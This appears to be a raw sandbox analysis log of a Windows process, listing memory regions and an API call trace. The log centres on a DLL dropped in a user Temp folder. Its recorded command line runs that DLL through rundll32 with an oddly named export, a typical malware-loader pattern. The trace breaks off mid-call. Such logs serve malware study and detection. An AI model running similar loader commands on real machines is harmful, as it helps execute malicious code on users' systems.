monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1204 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1205 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1206 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1207 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1208 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1209 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1210 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1211 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1212 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1213 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1214 start_va = 0x76d60000 end_va = 0x7716afff monitored = 0 entry_point = 0x76d8adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1215 start_va = 0x68ae0000 end_va = 0x68af5fff monitored = 0 entry_point = 0x68ae21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1216 start_va = 0x66680000 end_va = 0x66682fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\SysWOW64\\sfc.dll" (normalized: "c:\\windows\\syswow64\\sfc.dll") Region: id = 1217 start_va = 0x6a310000 end_va = 0x6a376fff monitored = 0 entry_point = 0x6a325a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 1218 start_va = 0x71540000 end_va = 0x7155afff monitored = 0 entry_point = 0x71549050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1219 start_va = 0x68ad0000 end_va = 0x68adefff monitored = 0 entry_point = 0x68ad63e0 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\SysWOW64\\sfc_os.dll" (normalized: "c:\\windows\\syswow64\\sfc_os.dll") Region: id = 1221 start_va = 0x4250000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 1222 start_va = 0x110000 end_va = 0x139fff monitored = 0 entry_point = 0x115680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1223 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1224 start_va = 0x4880000 end_va = 0x4a07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004880000" filename = "" Region: id = 1225 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1226 start_va = 0x30000 end_va = 0x30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui") Region: id = 1227 start_va = 0x4a10000 end_va = 0x4b90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a10000" filename = "" Region: id = 1228 start_va = 0x4ba0000 end_va = 0x5f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 1229 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1230 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 1231 start_va = 0x42e0000 end_va = 0x43c9fff monitored = 0 entry_point = 0x431d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1232 start_va = 0x76bc0000 end_va = 0x76bdafff monitored = 0 entry_point = 0x76bc73e0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1233 start_va = 0x4250000 end_va = 0x428ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 1234 start_va = 0x4290000 end_va = 0x42cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 1235 start_va = 0x42d0000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 1236 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1237 start_va = 0x68a70000 end_va = 0x68ac2fff monitored = 1 entry_point = 0x68a90809 region_type = mapped_file name = "dnrdfsi11023.dll" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dnrdfsi11023.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dnrdfsi11023.dll") Region: id = 1238 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1239 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1240 start_va = 0x71570000 end_va = 0x7177cfff monitored = 0 entry_point = 0x7165acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1241 start_va = 0x220000 end_va = 0x22dfff monitored = 0 entry_point = 0x224600 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 1242 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1243 start_va = 0x5fa0000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fa0000" filename = "" Region: id = 1246 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1247 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1248 start_va = 0x42e0000 end_va = 0x439bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000042e0000" filename = "" Region: id = 1249 start_va = 0x220000 end_va = 0x223fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1250 start_va = 0x72c90000 end_va = 0x72cacfff monitored = 0 entry_point = 0x72c93b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1251 start_va = 0x43a0000 end_va = 0x43a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043a0000" filename = "" Region: id = 1252 start_va = 0x71780000 end_va = 0x718fdfff monitored = 0 entry_point = 0x717fc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1253 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1254 start_va = 0x6150000 end_va = 0x6486fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1255 start_va = 0x43b0000 end_va = 0x43b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043b0000" filename = "" Region: id = 1256 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1257 start_va = 0x43c0000 end_va = 0x43c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1258 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1259 start_va = 0x71520000 end_va = 0x71531fff monitored = 0 entry_point = 0x71524510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1260 start_va = 0x714f0000 end_va = 0x7151efff monitored = 0 entry_point = 0x714fbb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1261 start_va = 0x71450000 end_va = 0x714eafff monitored = 0 entry_point = 0x7148f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1262 start_va = 0x4600000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1263 start_va = 0x4640000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 1264 start_va = 0x4780000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 1265 start_va = 0x43d0000 end_va = 0x43d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 1266 start_va = 0x71400000 end_va = 0x7144efff monitored = 0 entry_point = 0x7140d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1267 start_va = 0x713f0000 end_va = 0x713f7fff monitored = 0 entry_point = 0x713f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1268 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1269 start_va = 0x4680000 end_va = 0x46bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 1270 start_va = 0x46c0000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 1271 start_va = 0x70a30000 end_va = 0x70ab3fff monitored = 0 entry_point = 0x70a56530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1272 start_va = 0x4700000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1273 start_va = 0x4740000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 1274 start_va = 0x71780000 end_va = 0x718fdfff monitored = 0 entry_point = 0x717fc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1275 start_va = 0x43e0000 end_va = 0x43e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043e0000" filename = "" Region: id = 1276 start_va = 0x70490000 end_va = 0x704d6fff monitored = 0 entry_point = 0x704a58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1277 start_va = 0x704e0000 end_va = 0x704e7fff monitored = 0 entry_point = 0x704e1920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1278 start_va = 0x43f0000 end_va = 0x43f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 1279 start_va = 0x5fa0000 end_va = 0x5fa7fff monitored = 0 entry_point = 0x5fa19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1280 start_va = 0x5fb0000 end_va = 0x5fb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1281 start_va = 0x6140000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006140000" filename = "" Region: id = 1282 start_va = 0x5fa0000 end_va = 0x5fa7fff monitored = 0 entry_point = 0x5fa19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1283 start_va = 0x5fb0000 end_va = 0x5fb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1284 start_va = 0x5fa0000 end_va = 0x5fa7fff monitored = 0 entry_point = 0x5fa19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1285 start_va = 0x5fb0000 end_va = 0x5fb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1286 start_va = 0x5fa0000 end_va = 0x5fa7fff monitored = 0 entry_point = 0x5fa19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1287 start_va = 0x5fb0000 end_va = 0x5fb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 1288 start_va = 0x70420000 end_va = 0x70483fff monitored = 0 entry_point = 0x7043afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1289 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1290 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1291 start_va = 0x5fa0000 end_va = 0x5fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fa0000" filename = "" Region: id = 1292 start_va = 0x5fe0000 end_va = 0x601ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fe0000" filename = "" Region: id = 1293 start_va = 0x6020000 end_va = 0x6021fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 1294 start_va = 0x70410000 end_va = 0x7041ffff monitored = 0 entry_point = 0x70414600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1295 start_va = 0x703f0000 end_va = 0x7040ffff monitored = 0 entry_point = 0x703fd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1296 start_va = 0x703c0000 end_va = 0x703ebfff monitored = 0 entry_point = 0x703dbb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1297 start_va = 0x6030000 end_va = 0x6030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006030000" filename = "" Region: id = 1298 start_va = 0x70390000 end_va = 0x70397fff monitored = 0 entry_point = 0x70391d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1299 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1300 start_va = 0x70ac0000 end_va = 0x70ad2fff monitored = 0 entry_point = 0x70ac9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1301 start_va = 0x709b0000 end_va = 0x709defff monitored = 0 entry_point = 0x709c95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1302 start_va = 0x6020000 end_va = 0x605ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 1303 start_va = 0x6060000 end_va = 0x609ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006060000" filename = "" Region: id = 1304 start_va = 0x703a0000 end_va = 0x703b9fff monitored = 0 entry_point = 0x703afa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1305 start_va = 0x60a0000 end_va = 0x60a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1314 start_va = 0x60b0000 end_va = 0x60bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000060b0000" filename = "" Region: id = 1315 start_va = 0x60c0000 end_va = 0x60c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060c0000" filename = "" Region: id = 1316 start_va = 0x60d0000 end_va = 0x60d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060d0000" filename = "" Region: id = 1317 start_va = 0x60c0000 end_va = 0x60c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000060c0000" filename = "" Region: id = 1330 start_va = 0x60c0000 end_va = 0x60c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000060c0000" filename = "" Region: id = 1333 start_va = 0x60c0000 end_va = 0x60c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000060c0000" filename = "" Region: id = 1475 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1476 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1477 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1478 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1479 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1481 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1482 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1483 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1484 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1486 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1487 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1489 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1490 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Region: id = 1492 start_va = 0x4250000 end_va = 0x4251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004250000" filename = "" Thread: id = 104 os_tid = 0x144 [0145.246] GetProcessHeap () returned 0x4780000 [0145.247] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0145.247] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSectionEx") returned 0x76746740 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventExW") returned 0x767466a0 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreExW") returned 0x76746700 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadStackGuarantee") returned 0x7673b040 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolTimer") returned 0x7673ace0 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolTimer") returned 0x77217dc0 [0145.248] GetProcAddress (hModule=0x76720000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77224010 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolTimer") returned 0x77222a50 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWait") returned 0x7673a7b0 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolWait") returned 0x77222290 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWait") returned 0x77222910 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="FlushProcessWriteBuffers") returned 0x77247a60 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7723ac00 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcessorNumber") returned 0x7722a890 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="GetLogicalProcessorInformation") returned 0x7673ac80 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="CreateSymbolicLinkW") returned 0x76760830 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="SetDefaultDllDirectories") returned 0x76a46270 [0145.249] GetProcAddress (hModule=0x76720000, lpProcName="EnumSystemLocalesEx") returned 0x7673fe80 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringEx") returned 0x7673ff80 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="GetDateFormatEx") returned 0x76760e00 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoEx") returned 0x7673a750 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="GetTimeFormatEx") returned 0x76761240 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="GetUserDefaultLocaleName") returned 0x7673ad60 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="IsValidLocaleName") returned 0x76761460 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="LCMapStringEx") returned 0x76739a10 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount64") returned 0x76733630 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0145.250] GetProcAddress (hModule=0x76720000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0145.251] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x8, Size=0x3bc) returned 0x4797118 [0145.251] GetCurrentThreadId () returned 0x144 [0145.251] GetCommandLineA () returned="C:\\Windows\\system32\\rundll32.exe \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dnrdfsi11023.dll\",Rdwmnjioffws" [0145.251] GetEnvironmentStringsW () returned 0x47974e0* [0145.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", 